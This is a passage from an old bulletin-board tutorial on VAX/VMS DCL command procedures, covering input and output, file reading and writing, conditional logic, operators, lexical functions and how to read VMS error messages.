local symbol table accessible only by this particular COM file. If on the other hand, you specify /GLOBAL, the variable is placed in the global symbol table and is made accessible to other files. (4) IF pn .eqs. "" THEN INQUIRE pn "prompt" You can use this method to check if a certain variable (pn in this case) is null or not. If it is, you can ask for input. (5) READ/PROMPT="prompt" SYS$COMMAND variable This is another method of getting input. SUPPLY INPUT FOR A PROGRAM Often you may need to create a file and get input from some outside source. Again there are several ways of doing this. Here I will outline three different methods: FROM DATA :- CREATE TEST.DAT data line 1 data line 2 : : etc etc FROM TERMINAL :- DEFINE/USER_MODE SYS$INPUT SYS$COMMAND CREATE TEST.DAT FROM A FILE :- DEFINE/USER_MODE SYS$INPUT TEST.INPUT CREATE TEST.FILE OUTPUTTING INFORMATION In general when outputting information, you should always send it to SYS$OUTPUT What this does is automatically write to whatever the user has defined as SYS$OUTPUT. It doesn't matter what type of terminal or whatever it is, but it will send it in the correct format. Some examples follow: (1) WRITE SYS$OUTPUT "literal text" This will print 'literal text' on your terminal. (2) WRITE SYS$OUTPUT symbol-name This will print on your terminal whatever value is held in symbol-name (3) WRITE SYS$OUTPUT "literal text ''symbol-name' literal text" This example shows how you can mix in normal text with a variable and follow it by more text. (4) TYPE SYS$INPUT this is a sample message that is spread out over several lines. You would use this method whenever there are more than a few lines of text to be printed. WRITING TO A FILE You will find that many times when writing a COMmand procedure you will need to save certain information to a file. This can be accomplished with a routine similar to: OPEN/WRITE FILE TEST.DAT WRITE: INQUIRE DATA "Input Data" IF DATA .EQS. "" THEN GOTO DONE WRITE FILE DATA GOTO WRITE DONE: CLOSE FILE I will give a quick breakdown of what is going on here. First you open the file that you want, including the /WRITE qualifier followed by the filename. This sample program simply inputs data, writes each line to a file and exits when the user hits RETURN on a blank line. Simple but effective text input facility. READING A FILE Once you have written a file, you will often need to read that information back in again. For example you may keep track of when the person last ran the file. Each time the file is run, you would save the time/date to a file, and then read it back in, and display it on each subsequent execution. The sample structure of a read routine would be: OPEN/READ FILE TEST.DAT READ: READ/END_OF_FILE=DONE FILE DATA . . . GOTO READ DONE: CLOSE FILE This routine would loop and keep reading a file, one line at a time, storing the information in DATA until the end of file is detected. CONDITIONAL LOGIC No programming language would be complete without the ability to perform logic. Although it is very simplistic, it provides just enough power to handle most simple conditions. Some examples: (1) IF p1 .EQS. "" THEN GOTO DEFAULT In this example the procedure checks to see if the parameter passed in p1 is NULL or not. If it is then the program branches to DEFAULT (2) IF p1 .NES. 10 THEN GOTO end_label . . . END_LABEL: Here we see that if p1 does not equal 10 then the program branches to END_LABEL, otherwise it continues. (3) COUNT = 0 LOOP: COUNT=COUNT+1 . . . IF COUNT .LE. 10 THEN GOTO LOOP EXIT This example shows how to establish a loop in a command procedure, using the symbol COUNT and an IF statement. The IF statement checks the value of COUNT and performs an EXIT when the value is greater than 10 EXPRESSIONS The data operations and comparisons are listed below in order of precedence beginning with the highest (operations and comparisons grouped together in the table have the same precedence). +--------+---------------------------------------------------------+ Operator Description +--------+---------------------------------------------------------+ + Indicates a positive number - Indicates a negative number +--------+---------------------------------------------------------+ * Multiplies two numbers / Divides two numbers +--------+---------------------------------------------------------+ + (1) Adds two numbers (2) Concatenates two character strings - (1) Subtracts two numbers (2) Subtracts two character strings +--------+---------------------------------------------------------+ .EQS. Tests if two character strings are equal .GES. Tests if first character string is greater than or equal .GTS. Tests if first character string is greater than .LES. Tests if first character string is less than or equal .LTS. Tests if first character string is less than .NES. Tests if two character strings are not equal .EQ. Tests if two numbers are equal .GE. Tests if first number is greater than or equal to .GT. Tests if first number is greater than .LE. Tests if first number is less than or equal to .LT. Tests if first number is less than .NE. Tests if two numbers are not equal +--------+---------------------------------------------------------+ .NOT. Logically negates a number +--------+---------------------------------------------------------+ .AND. Combines two numbers with a logical AND +--------+---------------------------------------------------------+ .OR. Combines two numbers with a logical OR +--------+---------------------------------------------------------+ LEXICAL FUNCTIONS ----------------- That concludes the introduction to DCL programming. One thing that you should keep in mind is that many powerful string editing and environment information commands can be accessed from COM files. These are called the LEXICAL functions There are too numerous to list them all here, so I will just provide a summary of the primary lexical functions and a brief description: LEXICAL DESCRIPTION -------------+------------------------------------------------------------------ f$cvsi !converts character string data (signed value) to an integer f$cvtime !retrieves information about an absolute, combination, or delta time f$cvui !converts character string data (unsigned value) to an integer f$directory !returns the current default directory name string f$edit !edits a character string based on the edits specified f$element !extracts an element from a string in which the elements are !separated by a specified delimiter f$environment!obtains information about the DCL command environment f$extract !extracts a substring from a character string expression f$fao !converts the control string to an ASCII string f$file_attrib!returns attribute information for a specified file f$getdvi !returns parameters for a specified device f$getjpi !returns accounting, status and identification info for a process f$getsyi !returns status and identification information about local or !remote nodes. f$identifer !converts an identifier in named format to its integer equivalent f$integer !returns the integer equivalent of the result of an expression f$locate !locates a character substring within a string and returns its !offset within the string f$logical !translates a logical name and returns the equivalence name string f$message !returns the message text associated with a system status code f$mode !shows the mode in which the process is executing f$parse !parses a file spec and returns either the expanded file spec or !a particular field that you specify f$pid !for each invocation, returns the next PID in sequence f$privilege !returns a value of TRUE or FALSE depending on whether your !process privileges match the privileges listed in the argument f$process !returns the current process name string f$search !searches the directory and returns the full file spec for any file f$setprv !sets the specified privileges and returns the previous state f$string !returns the string equivalent of the result of the specified !expression f$time !returns the data and time of day in format: dd-mm-yy hh:mm:ss.cc f$trnlnm !translates a logical name and returns the equivalent name string f$type !determines the data type of a symbol f$user !returns the current user identification code (UIC) f$verify !set or read current command procedure state -------------+----------------------------------------------------------------- This list just outlines the main lexical functions. Within each function there may be many more subfunctions. If you need help on any of these functions or their subfunctions, just type HELP lexical [lexicalname] at any DCL prompt ($) ERROR MESSAGES -------------- Occasionally when you are using DCL, you will come across error messages that are sent to you by the VAX. Here I will give a break down of what the different fields in the message represent and how to interpret them. First of all, the general format of an error message is: %facility-l-ident, text NOTE: not all messages are ERROR messages. Often it is only an informational message telling you that a certain task was successful or whatever. In any case here is what each field means: facility -this is the name of the facility that produced the error (for example, CLI for the Command Language Interpreter). l -this is a one letter code indicating the severity of the error. The severities are: I - Informational E - Error S - Success F - Severe error W - Warning ident -this is an abbreviation for the message text. text -this is a short description of the nature of the error. Here is an example of an error message, and how to interpret it: %SYSTEM-F-NOCMKRNL, operation requires CMKRNL privilege The percent sign in the beginning tells you it is a system message from the VAX the first field (SYSTEM) indicates that it is a SYSTEM error. The second field (F) shows that it is a severe error. The third field (NOCMKRNL) is a short abbreviation showing that you do not have the CMKRNL privilege, and the actual text is followed giving the error in TCHING Downloaded From P-80 Systems 304-744-2253 Downloaded From P-80 International Information Systems 304-744-2253 12yrs+